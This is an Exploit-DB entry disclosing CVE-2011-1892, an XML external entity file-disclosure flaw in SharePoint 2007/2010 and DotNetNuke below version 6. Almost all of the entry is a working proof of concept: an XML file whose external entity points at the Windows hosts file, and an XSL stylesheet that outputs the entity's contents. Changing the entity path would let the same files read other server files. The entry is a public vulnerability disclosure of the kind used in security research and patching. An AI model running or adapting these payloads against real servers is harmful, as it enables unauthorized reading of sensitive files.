SharePoint 2007/2010 and DotNetNuke < 6 - File disclosure via XEE

2011-09-20T00:00:00
ID EDB-ID:17873
Type exploitdb
Reporter Nicolas Gregoire
Modified 2011-09-20T00:00:00

Description

SharePoint 2007/2010 and DotNetNuke < 6 - File disclosure via XEE. CVE-2011-1892. Webapps exploit for windows platform

                                        
                                            Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke
Date: September 15, 2011
Author: Nicolas Gregoire
Version: SharePoint 2007 / 2010, DotNetNuke &lt; 6
CVE : CVE-2011-1892

poc filename: xee.xml

&lt;!DOCTYPE doc [
&lt;!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts"&gt;
]&gt;
&lt;doc&gt;&boom;&lt;/doc&gt;

poc filename: xee.xsl

&lt;xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"&gt;
        &lt;xsl:template match="/"&gt;
        &lt;xsl:apply-templates/&gt;
                &lt;xsl:value-of select="doc"/&gt;
        &lt;/xsl:template&gt;
&lt;/xsl:stylesheet&gt;